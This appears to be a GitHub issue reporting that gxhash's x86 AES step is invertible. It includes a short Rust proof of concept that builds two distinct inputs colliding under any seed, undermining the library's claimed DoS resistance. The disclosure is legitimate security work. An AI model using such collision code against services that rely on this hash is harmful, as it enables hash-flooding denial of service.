- Notifications
You must be signed in to change notification settings - Fork32
Open
Description
There are probably other issues as well, but this line is particularly problematic:
gxhash/src/gxhash/platform/x86.rs
Line 86 in8bee61e
| letmut tmp1 =aes_encrypt(v0, v2); |
This is trivial to invert and allows you to create arbitrary seed-independent multicollisions. I would suggest not advertising DoS resistance on this hash at all.
// Not an endorsement of aes_crypto, just the first crate// I could find that allows cross-platform single-round encryption.use aes_crypto::AesBlock;fnmain(){let zero_key =AesBlock::zero();letmut s0 =[0u8;192];letmut s1 =[0u8;192]; s0[64] =100; s1[64] =42;let v0 =AesBlock::new(s0[64..64 +16].try_into().unwrap()); v0.enc(zero_key).store_to(&mut s0[64 +32..]);let v0 =AesBlock::new(s1[64..64 +16].try_into().unwrap()); v0.enc(zero_key).store_to(&mut s1[64 +32..]);// Different strings.assert!(s0 != s1);// Collide regardless of seed.assert!(gxhash::gxhash128(&s0,0) == gxhash::gxhash128(&s1,0));assert!(gxhash::gxhash128(&s0,0xdeadbeef) == gxhash::gxhash128(&s1,0xdeadbeef));}